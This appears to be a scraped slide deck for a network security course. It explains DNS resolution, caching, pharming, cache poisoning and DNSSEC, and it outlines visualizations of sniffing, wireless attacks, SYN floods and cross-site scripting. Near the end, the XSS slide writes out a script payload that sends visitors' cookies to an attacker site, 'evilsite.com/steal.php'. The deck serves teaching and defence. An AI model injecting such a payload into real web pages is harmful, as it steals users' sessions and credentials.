230 likes | 486 Views
Computer Networks: Domain Name System. Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses. DNS. www.example.com. 208.77.188.166. http:// www.example.com. My Example Blog Spot. http://208.77.188.166.
E N D
Computer Networks: Domain Name System
Domain Name System • The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses DNS www.example.com 208.77.188.166 http://www.example.com My Example Blog Spot http://208.77.188.166 My Example Blog Spot Vacation Savings Vacation Savings
. (root) Resolver cache .com Local Name Server Resolver Application Resolver google.com cache Resolver cache cache Iterative Name Resolution 1 answer query query 2 answer query answer 3
Name Resolution • Resolution method when answer not in cache: root name server Where is www.example.com? ISP DNS Server Try com nameserver Client com name server Where is www.example.com? Where is www.example.com? Try example.com nameserver 208.77.188.166 Where is www.example.com? example.com name server 208.77.188.166
Local NS Local Machine Resolver Application Resolver cache cache Local NS Local Machine Resolver Application Resolver cache cache DNS Caching Step 1: query yourdomain.org Authoritative Name Server query query Step 2: receive reply and cache at local NS and host Authoritative Name Server answer answer
Local NS Local Machine 1 Resolver Application Resolver cache cache Local Machine 2 Application Resolver cache DNS Caching (con'd) Step 3: use cached results rather than querying the ANS query answer Step 4: Evict cache entries upon ttl expiration
208.77.188.166 Pharming: DNS Hijacking 74.208.31.63 Normal DNS Pharming attack • Changing IP associated with a server maliciously: www.example.com www.example.com http://www.example.com http://www.example.com My Premium Blog Spot My Premium Blog Spot userID: userID: password: password: Phishing: the different web sites look the same.
DNS Cache Poisoning • Basic idea: give DNS servers false records and get it cached • DNS uses a 16-bit request identifier to pair queries with answers • Cache may be poisoned when a name server: • Disregards identifiers • Has predictable ids • Accepts unsolicited DNS records
DNS Cache Poisoning Prevention • Use random identifiers for queries • Always check identifiers • Port randomization for DNS requests • Deploy DNSSEC • Challenging because it is still being deployed and requires reciprocity http://www.youtube.com/watch?v=1d1tUefYn4U http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks_demo.html
DNSSEC • Guarantees: • Authenticity of DNS answer origin • Integrity of reply • Authenticity of denial of existence • Accomplishes this by signing DNS replies at each step of the way • Uses public-key cryptography to sign responses • Typically use trust anchors, entries in the OS to bootstrap the process
DNSSEC Deployment • As the internet becomes regarded as critical infrastructure there is a push to secure DNS • NIST is in the process of deploying it on root servers now • May add considerable load to dns servers with packet sizes considerably larger than 512 byte size of UDP packets • There are political concerns with the US controlling the root level of DNS
Development steps • Work on the following lab first to understand DNS Pharming and cache poisoning attacks. • Learn basics in HTML5 • Design scenarios of DNS attacks • Implementation and user study
Experience DNS attacks • DNS Pharming attack from Kevin’s Du SEED labs in Syracuse University • http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_DNS/
HTML5 • The new standard for HTML • New Elements, New Attributes, Full CSS3 Support, Video and Audio, 2D/3D Graphics, Local Storage, Local SQL Database, Web Applications • New features should be based on HTML, CSS, DOM, and JavaScript • Reduce the need for external plugins (like Flash) • Better error handling • More markup to replace scripting • HTML5 should be device independent • URL: http://www.w3schools.com/html/html5_intro.asp
UTC/CSE Interactive Security Visualization
Network Security Visualization – Packet Sniffer • Packet sniffer is a program that captures all of the packets of data that pass through a given network interface, and recognizes and decodes certain packets of interest. • http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/packet_sniffer/packet_sniffer.html
Network Security Visualization -- Wireless Network Attacks Simulator • EavesdroppingThe attacker configures his/her network interface into promiscuous mode, which allows a network device to read each network packet that arrives at the device. • Evil Twin An evil twin is a wireless access point (AP) that masquerades as a legitimate one. • Man in the MiddleThe attacker intercepts the traffic between two computers. The attacker sniffs packets from the network, may modify the packets and inserts them back into the network. • ARP Cache PoisoningAddress Resolution Protocol (ARP) is a network layer protocol used to associate an IP address with a MAC address. A network device has an ARP cache, which contains all the IP addresses and MAC addresses the device has already matched together. • http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks.html
Network Security Visualization -- SYN Flood • SYN Flood, one of Denial-of-Service attacks • http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/SYNFloodDemo/index.htm
Network Security Visualization – Web Security • Cross site scripting: attacker injects scripting code into pages generated by a web application • Script could be malicious code • JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash • Threats: • Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising , execution of code on the client, ...
guestbook.html <html> <title>Sign My Guestbook!</title> <body> Sign my guestbook! <form action="sign.php" method="POST"> <input type="text" name="name"> <input type="text" name="message" size="40"> <input type="submit" value="Submit"> </form> </body> </html> XSS Example • Website allows posting of comments in a guestbook • Server incorporates comments into page returned <html> <body> <title>My Guestbook!</title> Thanks for signing my guestbook!<br /> Here's what everyone else had to say:<br /> Joe: Hi! <br /> John: Hello, how are you? <br /> Jane: How does this guestbook work? <br /> </body> • Comment that includes malicious JavaScript Evilguy: <script> document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie; </script> Redirect visitor to the attacker’s site and concatenate the user’s cookies to the URL as a GET parameter for the steal.php page. If the sign.php copies whatever the user types in the post form into the content of the guest book, the feedback will be sent to other users.
Animation of XSS • http://a4apphack.com/security/xss-made-simple-flash-animation • http://m6gatlinburg.com/tmp/xss/xss.html (under development)